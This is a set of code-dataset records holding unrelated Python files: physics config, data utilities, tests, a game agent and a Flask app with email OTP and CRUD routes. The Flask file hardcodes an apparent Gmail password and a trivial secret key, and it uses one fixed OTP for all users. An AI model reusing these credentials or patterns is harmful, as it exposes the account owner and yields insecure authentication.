liczba_pi + 1/(i * 2 + 1)\n break\n else:\n print('Podaj liczbe naturalną większą od jedynki!')\n continue\n\nliczba_pi = 4 * liczba_pi\n\nprint(liczba_pi)\n","sub_path":"liczba_pi.py","file_name":"liczba_pi.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"520488198","text":"#====================================================================\n# MUON0.py for events passed muon triggers\n# This requires the reductionConf flag MUON0 in Reco_tf.py \n#====================================================================\n\n# Set up common services and job object. \n# This should appear in ALL derivation job options\n# include(\"DerivationFrameworkCore/DerivationFrameworkMaster.py\")\nfrom DerivationFrameworkCore.DerivationFrameworkMaster import *\nfrom DerivationFrameworkMuons.MuonsCommon import *\n# from DerivationFrameworkJetEtMiss.METCommon import *\n\n#====================================================================\n# SET UP STREAM \n#====================================================================\nstreamName = derivationFlags.WriteDAOD_MUON0Stream.StreamName\nfileName = buildFileName( derivationFlags.WriteDAOD_MUON0Stream )\nMUON0Stream = MSMgr.NewPoolRootStream( streamName, fileName )\nMUON0Stream.AcceptAlgs([\"MUON0Kernel\"])\n\n# augStream = MSMgr.GetStream( streamName )\n# evtStream = augStream.GetEventStream()\n\ntriggerList1 = ['HLT_.*mu\\d+.*', 'L1_.*MU\\d+.*', 'HLT_noalg_L1.*MU\\d+.*']\n#triggerList1 = []\ntriggerList = ['HLT_.*mu.*', 'L1_.*MU.*','HLT_noalg_L1.*MU.*']\n\nfrom DerivationFrameworkCore.ThinningHelper import ThinningHelper\nMUON0ThinningHelper = ThinningHelper( \"MUON0ThinningHelper\" )\nMUON0ThinningHelper.TriggerChains = '|'.join(triggerList1)\nprintfunc (MUON0ThinningHelper.TriggerChains)\nMUON0ThinningHelper.AppendToStream( MUON0Stream )\nthinningHelperTool = getattr( ToolSvc, \"MUON0ThinningHelperSlim\" )\nthinningHelperTool.FeatureInclusionList += ['HLT_xAOD__L2StandAloneMuonContainer_MuonL2SAInfo','HLT_xAOD__L2StandAloneMuonContainer_MuonL2SAInfoAux.','HLT_xAOD__L2CombinedMuonContainer_MuonL2CBInfo','HLT_xAOD__L2CombinedMuonContainer_MuonL2CBInfoAux.','HLT_xAOD__L2IsoMuonContainer_MuonL2ISInfo','HLT_xAOD__L2IsoMuonContainer_MuonL2ISInfoAux.','HLT_TrigRoiDescriptorCollection_forMS','HLT_TrigRoiDescriptorCollection_forMSAux.','HLT_TrigRoiDescriptorCollection_forID','HLT_TrigRoiDescriptorCollection_forIDAux.']\n\n\n\n#====================================================================\n# AUGMENTATION TOOLS \n#====================================================================\n\n#====================================================================\n# STRING BASED SKIMMING TOOL \n#====================================================================\nMUON0_skimming_tools = []\n\n### trigger seleciton\nfrom DerivationFrameworkTools.DerivationFrameworkToolsConf import DerivationFramework__TriggerSkimmingTool\nMUON0SkimmingTool0a = DerivationFramework__TriggerSkimmingTool(name = \"MUON0SkimmingTool0a\",\n TriggerListOR = triggerList,\n TriggerListAND = [])\nToolSvc += MUON0SkimmingTool0a\n\n### muon selection\nexpression = 'count(Muons.pt>30*GeV)>0'\nfrom DerivationFrameworkTools.DerivationFrameworkToolsConf import DerivationFramework__xAODStringSkimmingTool\nMUON0SkimmingTool0b = DerivationFramework__xAODStringSkimmingTool(name = \"MUON0SkimmingTool0b\",\n expression = expression)\nToolSvc += MUON0SkimmingTool0b\n\n### OR combination\nfrom DerivationFrameworkTools.DerivationFrameworkToolsConf import DerivationFramework__FilterCombinationOR\nMUON0SkimmingTool0 = DerivationFramework__FilterCombinationOR(name=\"MUON0SkimmingTool0\",\n FilterList=[MUON0SkimmingTool0a, MUON0SkimmingTool0b])\nToolSvc += MUON0SkimmingTool0\n\n### adding the combined tool\nMUON0_skimming_tools.append(MUON0SkimmingTool0)\n\n#====================================================================\n# THINNING TOOL \n#====================================================================\n# Tracks associated with Muons\nMUON0_thinning_tools = []\n\n## keep only tracks near muon\nthinning_expression2 = \"Muons.pt > 4*GeV\"\nfrom DerivationFrameworkInDet.DerivationFrameworkInDetConf import DerivationFramework__MuonTrackParticleThinning\nMUON0ThinningTool2 = DerivationFramework__MuonTrackParticleThinning(name = \"MUON0ThinningTool2\",\n StreamName = streamName,\n MuonKey = \"Muons\",\n SelectionString = thinning_expression2,\n ConeSize = 0.4,\n InDetTrackParticlesKey = \"InDetTrackParticles\")\nToolSvc += MUON0ThinningTool2\nMUON0_thinning_tools.append(MUON0ThinningTool2)\n\n### also for forward tracks\nthinning_expression3 = \"Muons.muonType==4\"\nMUON0ThinningTool2f = DerivationFramework__MuonTrackParticleThinning(name = \"MUON0ThinningTool2f\",\n StreamName = streamName,\n MuonKey = \"Muons\",\n SelectionString = thinning_expression3,\n ConeSize = 0.5,\n InDetTrackParticlesKey = \"InDetForwardTrackParticles\")\nToolSvc += MUON0ThinningTool2f\nMUON0_thinning_tools.append(MUON0ThinningTool2f)\n\n#====================================================================\n# CREATE THE DERIVATION KERNEL ALGORITHM AND PASS THE ABOVE TOOLS \n#====================================================================\nfrom DerivationFrameworkCore.DerivationFrameworkCoreConf import DerivationFramework__DerivationKernel\nDerivationFrameworkJob += CfgMgr.DerivationFramework__DerivationKernel(\"MUON0Kernel\",\n# \t\t\t\t\t\t\t\t\tAugmentationTools = [],\n ThinningTools = MUON0_thinning_tools,\n SkimmingTools = MUON0_skimming_tools\n )\n\n#====================================================================\n# CONTENT LIST \n#====================================================================\nfrom DerivationFrameworkMuons.StreamConfig import MuonsDxAODStreamConfigurer as conf\nconf.Config(MUON0Stream, 'MUON0')\n","sub_path":"PhysicsAnalysis/DerivationFramework/DerivationFrameworkMuons/share/MUON0.py","file_name":"MUON0.py","file_ext":"py","file_size_in_byte":6645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"155956328","text":"\n\nclass CrimeLister():\n\n crime_records = []\n crime_counter = dict()\n\n def __init__(self, filename):\n self.filename = filename\n\n def populate_record(self):\n with open(self.filename) as f:\n lines = f.readlines()\n for line in lines:\n if line.find(\"DATE\") == -1: ## EXCLUDE HEADER\n line_content = line.strip()\n line_content = line_content.split(\",\")\n crime_type = line_content[len(line_content)-1]\n crime_id = line_content[len(line_content)-2]\n crime_key = crime_type + \",\" + crime_id\n self.crime_counter[crime_key] = self.crime_counter.get(crime_key + \"\", 0) + 1\n for crime in self.crime_counter.keys():\n crime_type_id = crime.split(\",\")\n self.crime_records.append([crime_type_id[0],crime_type_id[1],self.crime_counter[crime]])\n\n\n def print_crime_records(self):\n print(\"CRIME TYPE\".ljust(30) + \"CRIME ID\".ljust(10) + \"CRIME COUNT\".ljust(10)) ## HEADER PRINT\n print(\"-\"*50)\n for record in self.crime_records:\n print(str(record[0]).ljust(30) + str(record[1]).ljust(10) + str(record[2]).ljust(10))\n\ndef main():\n filepath = \"./Crime.csv\"\n crime_lister = CrimeLister(filepath)\n crime_lister.populate_record()\n crime_lister.print_crime_records()\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"575898109","text":"\"\"\"\nModule ansi_colors.py\n------------------------------------\n\n@author: awegsche\n\n@version: 1.0\n\nHelper functions to convert RGB and html colors to ansi escape sequences\n\n\"\"\"\n\nimport re\nfrom matplotlib import colors\n\nONE_OVER_256 = 0.00390625\nONE_OVER_16 = 0.0625\n\n\ndef ansi(color=\"none\"):\n \"\"\"\n Converts ```color``` into an ANSI escape sequence changing the color of the current\n terminal output.\n\n Args:\n color (string or tuple): A string representing the color. This can be one of the following:\n - an HTML color in the format ```#RRGGBB``` or ```#RGB```\n - a matplotlib color name like ```\"firebrick\"```\n - an RGB color in the format ```rgb:r,g,b``` where r,g,b \\\\in [0,1)\n example: ```rgb:1.0,0.0,0.0```\n - the string 'none' to reset the color to default\n - a tuple (r, g, b) where r,g,b \\\\in [0,1)\n\n \"\"\"\n if color == \"\" or color is None:\n return \"\\33[0m\"\n if isinstance(color, tuple):\n return \"\\33[38;2;{:d};{:d};{:d}m\".format(int(255*color[0]),\n int(255*color[1]),\n int(255*color[2]))\n tupl = clr_tuple(color)\n if tupl is not None:\n return ansi(tupl)\n if color == \"bold\":\n return \"\\33[1m\"\n if color == \"/bold\":\n return \"\\33[22m\"\n return \"\\33[0m\"\n\n\ndef clr_multiply(clr1, clr2):\n \"\"\" multiplies two colors\n\n Args:\n clr1 (string): representation (see ansi) of first color\n clr2 (string): representation of the second color\n \"\"\"\n a = clr_tuple(clr1)\n b = clr_tuple(clr2)\n\n return (max(0.0, min(1.0, a[0] * b[0])),\n max(0.0, min(1.0, a[1] * b[1])),\n max(0.0, min(1.0, a[2] * b[2])))\n\n\ndef clr_tuple(colorstring):\n \"\"\" converts colorstring into a tuple of ints (r,g,b)\n\n Args:\n colorstring (string): string representation of the color, see ansi\n \"\"\"\n\n if colorstring[0] == '#':\n if len(colorstring) == 7:\n return (ONE_OVER_256 * float(_hexbyte(colorstring[1:3])),\n ONE_OVER_256 * float(_hexbyte(colorstring[3:5])),\n ONE_OVER_256 * float(_hexbyte(colorstring[5:7])))\n if len(colorstring) == 4:\n return (ONE_OVER_16 * float(_hexchar(colorstring[1])),\n ONE_OVER_16 * float(_hexchar(colorstring[2])),\n ONE_OVER_16 * float(_hexchar(colorstring[3])))\n if colorstring in colors.CSS4_COLORS:\n return clr_tuple(colors.CSS4_COLORS[colorstring])\n if colorstring in colors.BASE_COLORS:\n return clr_tuple(colors.BASE_COLORS[colorstring])\n\n rgb_re = re.compile(\"rgb:(.*),(.*),(.*)\")\n\n rgb_match = rgb_re.search(colorstring)\n if rgb_match:\n return (float(rgb_match.group(1)),\n float(rgb_match.group(2)),\n float(rgb_match.group(3)))\n return None\n\n\ndef _hexbyte(b):\n \"\"\" Converts the hex number b to integer\n\n Args:\n b (string): a two-character representation of a byte, like 01, FF, A0 etc.\n \"\"\"\n return _hexchar(b[0]) * 16 + _hexchar(b[1])\n\n\ndef _hexchar(c):\n \"\"\" Converts the character b into a number.\n\n Args:\n c (char): character in base 16: 1, ... 9, A, ... F\n accepts lower case letters a, ... f\n \"\"\"\n if c == '1': return 1\n if c == '2': return 2\n if c == '3': return 3\n if c == '4': return 4\n if c == '5': return 5\n if c == '6': return 6\n if c == '7': return 7\n if c == '8': return 8\n if c == '9': return 9\n if c == 'A' or c == 'a': return 10\n if c == 'B' or c == 'b': return 11\n if c == 'C' or c == 'c': return 12\n if c == 'D' or c == 'd': return 13\n if c == 'E' or c == 'e': return 14\n if c == 'F' or c == 'f': return 15\n return 0\n","sub_path":"ansi_colors.py","file_name":"ansi_colors.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"269663966","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nimport argparse\nimport inspect\n\npath = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nsys.path.insert(0, path)\n\nif __name__ == \"__main__\":\n from bahubapp.service.configurationfactory import ConfigurationFactory\n from bahubapp.app import Bahub\n from bahubapp.service.logger import LoggerFactory\n from bahubapp.service.errorhandler import ErrorHandlerService\n from bahubapp.service.notifier import Notifier\n\n\ndef main():\n #\n # Arguments parsing\n #\n parser = argparse.ArgumentParser()\n parser.add_argument('options', metavar='options', type=str, nargs='+',\n help='[backup/restore/list/recover/snapshot] [backup or recovery plan name]')\n\n parser.add_argument('--debug', help='Prints debugging messages', default=False, action=\"store_true\")\n parser.add_argument('--uncensored', help='Do not remove credentials from logs', default=False, action=\"store_true\")\n\n parser.add_argument('--config',\n help='Path to the configuration file',\n default=os.path.expanduser('~/.bahub.yaml'))\n\n parser.add_argument('--logs-path',\n help='Logs path',\n default=os.path.expanduser('/tmp'))\n\n parser.add_argument('--logs-file',\n help='Log to a single file, instead of creating files by date',\n default='')\n\n parser.description = 'Bahub - backup automation client for File Repository API'\n\n parsed = parser.parse_args()\n\n if 0 < len(parsed.options) < 2:\n print(' You need to specify two options eg. \"backup some-name\"')\n print('')\n print('Example usage:')\n print(' backup my_db_1')\n print(' restore my_db_1 latest')\n print(' restore my_db_1 v2')\n print(' list my_db_1')\n print(' recover my_recovery_plan_name')\n print(' snapshot my_recovery_plan_name')\n print('')\n sys.exit(1)\n\n if not os.path.isfile(parsed.config):\n print(' Configuration file \"' + str(parsed.config) + '\" does not exist')\n sys.exit(1)\n\n error_handler = None\n notifier = None\n\n try:\n config_factory = ConfigurationFactory(parsed.config, parsed.debug)\n notifier = Notifier(config_factory.get_notifiers())\n error_handler = ErrorHandlerService(config_factory.get_error_handlers())\n\n app = Bahub(\n factory=config_factory,\n options={\n 'options': parsed.options,\n 'debug': parsed.debug,\n 'config': parsed.config\n },\n uncensored=parsed.uncensored,\n logger=LoggerFactory.create(parsed.debug, parsed.logs_path, parsed.logs_file),\n notifier=notifier\n )\n\n app.run_controller(parsed.options[0], parsed.options[1], parsed.debug, parsed.options)\n\n except Exception as e:\n if parsed.debug:\n raise e\n\n if error_handler:\n error_handler.record_exception(e)\n\n if notifier:\n notifier.exception_occurred(e)\n\n print(e)\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"client/bahub/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"390892930","text":"'''\n- compute subreddit-topcategory features\n- and subredit topcat/cat pca\n'''\n\nfrom pyspark import SparkContext, SparkConf, SparkFiles\nimport json\nimport csv\nimport time\nimport math\nimport pickle\nfrom functools import reduce\nfrom jobs.shared import utils\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.preprocessing import normalize\n\n\ndef analyze(sc, **kwargs):\n pp = kwargs['pp']\n job_name = kwargs['job-name']\n timestamp = int(time.time())\n hdfs_root = kwargs['hdfs-root']\n input_path = utils.get_input_path(hdfs_root, kwargs.get('input-job', None), kwargs.get('input-path', None))\n\n _subreddit_topcategory = pickle.load(open('/home/username/data/output/_jobs/subreddit_topcategory.pickle','rb'))\n subreddit_topcategory = sc.broadcast(_subreddit_topcategory)\n\n _subreddit_df = pickle.load(open('/home/username/data/output/_jobs/subreddit_df.pickle','rb'))\n subreddit_df = sc.broadcast(_subreddit_df)\n\n subreddits_grouped_by_categories = subreddits_to_categories(_subreddit_df, subreddit_topcategory)\n _vectorizers = {}\n for k,v in subreddits_grouped_by_categories.items():\n dv = DictVectorizer()\n dv.fit_transform(v)\n _vectorizers[k] = dv\n vectorizers = sc.broadcast(_vectorizers)\n\n\n data = sc.pickleFile(input_path)\n\n authors_total = data.count()\n author_category = data.map(lambda x: get_feature_vectors(x, subreddit_df, authors_total, vectorizers) )\n\n output_path = utils.hdfs_get_output_path(hdfs_root, job_name)\n author_category.saveAsPickleFile(output_path)\n\n\ndef get_feature_vectors(author, subreddit_df, authors_total, vectorizers):\n category_subreddits = author['topcategory_subreddits']\n\n catsr_vecs = {}\n for cat, subreddits in category_subreddits.items():\n all_terms_in_doc = reduce(lambda a,b: a+b, map(lambda x: (x['submissions'] + x['comments']), author['subreddits']))\n tfidf = {}\n lognorm = {}\n raw = {}\n for k,v in subreddits.items():\n try:\n count = v\n idf = (math.log(authors_total / subreddit_df.value[k]))\n tfidf[k] = (count / all_terms_in_doc) * idf\n lognorm[k] = math.log(1 + count) * idf\n raw[k] = count\n except KeyError:\n print(k) \n\n catsr_vecs[cat] = {}\n catsr_vecs[cat]['tfidf'] = vectorizers.value[cat].transform(tfidf)\n catsr_vecs[cat]['lntfidf'] = vectorizers.value[cat].transform(lognorm)\n catsr_vecs[cat]['raw'] = vectorizers.value[cat].transform(raw)\n catsr_vecs[cat]['rawnorm'] = normalize(catsr_vecs[cat]['raw'])\n\n author['topcatsr'] = catsr_vecs\n\n return author\n\ndef subreddits_to_categories(subreddit_df, subreddit_category):\n category_subreddits = {}\n for k,v in subreddit_df.items():\n cat = subreddit_category.value.get(k, 'Other')\n\n if cat not in category_subreddits:\n category_subreddits[cat] = {}\n category_subreddits[cat][k] = v\n\n return category_subreddits\n\n","sub_path":"pyspark/jobs/author/subreddit_topcategories.py","file_name":"subreddit_topcategories.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"297567378","text":"# Merge Sort\n\n\ndef merge(left, right):\n \"\"\"Merges two sorted lists.\n Args:\n left: A sorted list.\n right: A sorted list.\n\n Returns:\n The sorted list resulting from merging the two sorted sublists.\n\n Requires:\n left and right are sorted.\n \"\"\"\n\n items = []\n\n i = 0\n j = 0\n while i < len(left) and j < len(right):\n if left[i] <= right[j]:\n items.append(left[i])\n i = i + 1\n else:\n items.append(right[j])\n j = j + 1\n\n if i < len(left):\n items.extend(left[i:])\n elif j < len(right):\n items.extend(right[j:])\n\n return items\n\n\ndef merge_sort(items):\n \"\"\"Sorts a list of items.\n\n Uses merge sort to sort the list items.\n \n Args:\n items: A list of items.\n\n Returns:\n The sorted list of items. \n \"\"\"\n n = len(items)\n if n < 2:\n return items\n\n m = n // 2\n left = merge_sort(items[:m])\n right = merge_sort(items[m:])\n return merge(left, right)\n","sub_path":"AutonomousSourceCode/data/raw/sort/39cf0f2e-d6c1-4606-9e97-3f60bda3a6a1__merge_sort_improved.py","file_name":"39cf0f2e-d6c1-4606-9e97-3f60bda3a6a1__merge_sort_improved.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"557519929","text":"from .brain import Brain\nfrom ..shared.strategies import RandomStrategy, RetreatStrategy, StalkStrategy, PickupStrategy, AdvKillStrategy, \\\n BasicAvoidStrategy, DetonateStrategy, BombStrategy, SimpleBombStrategy, AdvBlockStrategy, StalkTwoStrategy\nfrom ..shared.utils.benchmark import Benchmark\n\n\nclass Agent:\n def __init__(self):\n self.brain = Brain()\n self.strategies = {\n 'random': RandomStrategy(),\n 'retreat': RetreatStrategy(),\n 'pickup': PickupStrategy(),\n 'stalk': StalkStrategy(),\n 'basic_avoid': BasicAvoidStrategy(),\n 'kill': AdvKillStrategy(),\n 'detonate': DetonateStrategy(),\n 'bomb': BombStrategy(),\n 'block_destroy': AdvBlockStrategy(),\n 'simple_bomb': SimpleBombStrategy()\n }\n self.action_queue = []\n self.prev_tick = -1\n self.benchmark = Benchmark()\n\n def next_move(self, tick_number, game_state):\n # If it prints this out in console, it means algorithm is performing suboptimally\n if tick_number - self.prev_tick != 1:\n print(f'Skipped a Tick: Tick #{tick_number}, skipped {tick_number - self.prev_tick}')\n self.benchmark.start('move')\n game_state['tick'] = tick_number\n print(f'Starting tick #{tick_number}')\n\n if not self.action_queue:\n # Gets brain to eval environment, then spit out the strategy chosen (as string)\n self.benchmark.start('decision')\n strategy_name = self.brain.get_next_strategy(game_state)\n self.benchmark.end('decision')\n self.benchmark.start('execution')\n strategy = self.strategies.get(strategy_name) \n strategy.update(game_state)\n actions = strategy.execute(game_state)\n self.benchmark.end('execution')\n print(f'Tick {tick_number}: executing {strategy_name}: {actions}')\n self.action_queue = self.action_queue + actions\n\n # print(game_state) #-> To check if you've added new things to game_state\n self.prev_tick = tick_number\n self.benchmark.end('move')\n return self.action_queue.pop(0)\n","sub_path":"python3/agents/aggro_totoro_agent/my_agent.py","file_name":"my_agent.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"440453908","text":"# Copyright 2015 OpenStack Foundation\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\nfrom testtools.matchers import HasLength\n\nfrom watcher.common import exception\n# from watcher.common import utils as w_utils\nfrom watcher import objects\nfrom watcher.tests.db import base\nfrom watcher.tests.db import utils\n\n\nclass TestAuditObject(base.DbTestCase):\n\n def setUp(self):\n super(TestAuditObject, self).setUp()\n self.fake_audit = utils.get_test_audit()\n\n def test_get_by_id(self):\n audit_id = self.fake_audit['id']\n with mock.patch.object(self.dbapi, 'get_audit_by_id',\n autospec=True) as mock_get_audit:\n mock_get_audit.return_value = self.fake_audit\n audit = objects.Audit.get(self.context, audit_id)\n mock_get_audit.assert_called_once_with(self.context,\n audit_id)\n self.assertEqual(self.context, audit._context)\n\n def test_get_by_uuid(self):\n uuid = self.fake_audit['uuid']\n with mock.patch.object(self.dbapi, 'get_audit_by_uuid',\n autospec=True) as mock_get_audit:\n mock_get_audit.return_value = self.fake_audit\n audit = objects.Audit.get(self.context, uuid)\n mock_get_audit.assert_called_once_with(self.context, uuid)\n self.assertEqual(self.context, audit._context)\n\n def test_get_bad_id_and_uuid(self):\n self.assertRaises(exception.InvalidIdentity,\n objects.Audit.get, self.context, 'not-a-uuid')\n\n def test_list(self):\n with mock.patch.object(self.dbapi, 'get_audit_list',\n autospec=True) as mock_get_list:\n mock_get_list.return_value = [self.fake_audit]\n audits = objects.Audit.list(self.context)\n self.assertEqual(mock_get_list.call_count, 1)\n self.assertThat(audits, HasLength(1))\n self.assertIsInstance(audits[0], objects.Audit)\n self.assertEqual(self.context, audits[0]._context)\n\n def test_create(self):\n with mock.patch.object(self.dbapi, 'create_audit',\n autospec=True) as mock_create_audit:\n mock_create_audit.return_value = self.fake_audit\n audit = objects.Audit(self.context, **self.fake_audit)\n\n audit.create()\n mock_create_audit.assert_called_once_with(self.fake_audit)\n self.assertEqual(self.context, audit._context)\n\n def test_destroy(self):\n uuid = self.fake_audit['uuid']\n with mock.patch.object(self.dbapi, 'get_audit_by_uuid',\n autospec=True) as mock_get_audit:\n mock_get_audit.return_value = self.fake_audit\n with mock.patch.object(self.dbapi, 'destroy_audit',\n autospec=True) as mock_destroy_audit:\n audit = objects.Audit.get_by_uuid(self.context, uuid)\n audit.destroy()\n mock_get_audit.assert_called_once_with(self.context, uuid)\n mock_destroy_audit.assert_called_once_with(uuid)\n self.assertEqual(self.context, audit._context)\n\n def test_save(self):\n uuid = self.fake_audit['uuid']\n with mock.patch.object(self.dbapi, 'get_audit_by_uuid',\n autospec=True) as mock_get_audit:\n mock_get_audit.return_value = self.fake_audit\n with mock.patch.object(self.dbapi, 'update_audit',\n autospec=True) as mock_update_audit:\n audit = objects.Audit.get_by_uuid(self.context, uuid)\n audit.state = 'SUCCEEDED'\n audit.save()\n\n mock_get_audit.assert_called_once_with(self.context, uuid)\n mock_update_audit.assert_called_once_with(\n uuid, {'state': 'SUCCEEDED'})\n self.assertEqual(self.context, audit._context)\n\n def test_refresh(self):\n uuid = self.fake_audit['uuid']\n returns = [dict(self.fake_audit, state=\"first state\"),\n dict(self.fake_audit, state=\"second state\")]\n expected = [mock.call(self.context, uuid),\n mock.call(self.context, uuid)]\n with mock.patch.object(self.dbapi, 'get_audit_by_uuid',\n side_effect=returns,\n autospec=True) as mock_get_audit:\n audit = objects.Audit.get(self.context, uuid)\n self.assertEqual(\"first state\", audit.state)\n audit.refresh()\n self.assertEqual(\"second state\", audit.state)\n self.assertEqual(expected, mock_get_audit.call_args_list)\n self.assertEqual(self.context, audit._context)\n","sub_path":"watcher/tests/objects/test_audit.py","file_name":"test_audit.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"593945435","text":"from flask import Flask,redirect,url_for,render_template,request,flash\nfrom flask_mail import Mail,Message\nfrom random import randint \nfrom project_database import Register,Base\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import create_engine\n#engine=create_engine('sqlite:///iii.db')\nengine=create_engine('sqlite:///iii.db',connect_args={'check_same_thread':False},echo=True)\nBase.metadata.bind=engine\nDBsession=sessionmaker(bind=engine)\nsession=DBsession()\n\napp=Flask(__name__)\n\napp.config['MAIL_SERVER']='smtp.gmail.com'\napp.config['MAIL_PORT']=465\napp.config['MAIL_USERNAME']='kondalaraju429@gmail.com'\napp.config['MAIL_PASSWORD']='kondalarajumail.com'\napp.config['MAIL_USE_TSL']=False\napp.config['MAIL_USE_SSL']=True\napp.secret_key = 'abc'\n\nmail = Mail(app)\notp=randint(00000,99999)\n\"\"\"@app.route(\"/sample\")\ndef demo():\n\treturn \"Hello World good\"\n\n@app.route(\"/demo_msg\")\ndef d():\n\treturn \"

    Hello demo

    \"\n\n@app.route(\"/info/details\")\ndef demos():\n\treturn \"

    Hello Details

    \"\n\n@app.route(\"/details///\")\ndef info(name,age,sal):\n\treturn \"hello {} age: {} salary: {}\".format(name,age,sal)\"\"\"\n\n@app.route(\"/admin\")\ndef admin():\n\treturn \"hello admin\"\n\n@app.route(\"/student\")\ndef student():\n\treturn \"hello stuednt\"\n\n@app.route(\"/staff\")\ndef staff():\n\treturn \"hello staff\"\n\n@app.route(\"/info/\")\ndef admin_info(name):\n\tif name=='admin':\n\t\treturn redirect(url_for('admin'))\n\telif name=='student':\n\t\treturn redirect(url_for('student'))\n\telif name=='staff':\n\t\treturn redirect(url_for('staff'))\n\telse:\n\t\treturn \"NO URL\"\n\n@app.route(\"/data///\")\ndef demo_html(name,age,salary):\n\treturn render_template('sample.html',n=name,a=age,s=salary)\n\n@app.route(\"/info-data\")\ndef info_data():\n\tsno=\"1\"\n\tname=\"raju\"\n\tdepartment=\"cse\"\n\tbranch=\"cse1\"\n\n\treturn render_template('sample1.html',s_no=sno,n=name,d=department,b=branch)\n\n\ndata=[\n{'sno':1,'n':\"raju\",'d':\"department\",'b':\"cse\"},\n{'sno':2,'n':\"nkr\",'d':\"french\",'b':\"It\"},\n{'sno':3,'n':\"rju\",'d':\"department\",'b':\"cse\"}\n]\n@app.route(\"/dummy_data\")\ndef dummy():\n\treturn render_template('data.html',dummy_data=data)\n\n\n@app.route(\"/table/\")\ndef table(num):\n\treturn render_template(\"table.html\",n=num)\n\n\n\n\n@app.route(\"/file_upload\",methods=['GET', 'POST'])\ndef file_upload():\n\treturn render_template(\"file_upload.html\")\n\n\n@app.route(\"/success\",methods=['GET', 'POST'])\ndef success():\n\tif request.method==\"POST\":\n\t\tf=request.files['file']\n\t\tf.save(f.filename)\n\n\t\treturn render_template(\"success.html\",f_name=f.filename)\n \n@app.route(\"/email\",methods=['GET','POST'])\ndef email():\n\treturn render_template(\"email.html\")\n@app.route(\"/email_verify\", methods=['GET','POST'])\ndef verify_email():\n\temail = request.form['email']\n\tmsg=Message(\"One Time Password\", sender=\"kondalaraju429@gmail.com\",recipients=[email])\n\tmsg.body=str(otp)\n\tmail.send(msg)\n\treturn render_template(\"v_email.html\")\n\n@app.route(\"/email_success\", methods=['POST','GET'])\ndef email_success():\n\tuser_otp=request.form['otp']\n\tif(otp==int(user_otp)):\n\t\treturn \"succcess\"\n\treturn \"invalid\"\n@app.route(\"/show\")\ndef showdb():\n\tregister=session.query(Register).all()\n\treturn render_template(\"show.html\",reg=register)\n@app.route(\"/New\",methods=['POST','GET'])\n\ndef addData():\n\tif request.method=='POST':\n\t\tnewData=Register(name=request.form['name'],surname=request.form['surname'],mobile=request.form['mobile'],branch=request.form['branch'],role=request.form['role'])\n\t\tsession.add(newData)\n\t\tsession.commit()\n\t\tflash(\"Data added....\")\n\t\treturn redirect(url_for('showdb'))\n\telse:\n\t\treturn render_template(\"new.html\")\n\n\n@app.route(\"/edit/\",methods=['POST','GET'])\ndef editData(register_id):\n\teditedData = session.query(Register).filter_by(id=register_id).one()\n\tif request.method=='POST':\n\t\teditedData.name = request.form['name']\n\t\teditedData.surname = request.form['surname']\n\t\teditedData.mobile = request.form['mobile']\n\t\teditedData.email = request.form['email']\n\t\teditedData.branch = request.form['branch']\n\t\teditedData.role = request.form['role']\n\n\t\tsession.add(editedData)\n\t\tsession.commit()\n\t\tflash(\"Edited successfully\")\n\t\treturn redirect(url_for('showdb'))\n\telse:\n\t\treturn render_template('edit.html',register=editedData)\n\n@app.route(\"/delete/\", methods=['POST','GET'])\ndef deleteData(register_id):\n\tdeletedData =session.query(Register).filter_by(id=register_id).one()\n\tif request.method=='POST':\t\n\t\tsession.delete(deletedData)\n\t\tsession.commit()\n\t\tflash(\"Deleted successfully\")\n\t\treturn redirect(url_for('showdb'))\n\telse:\n\t\treturn render_template('delete.html',register=deletedData)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n@app.route(\"/\")\ndef home():\n\treturn render_template(\"home.html\")\n\n\n\nif __name__=='__main__':\n\tapp.run(debug=True)\n","sub_path":"catalog/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}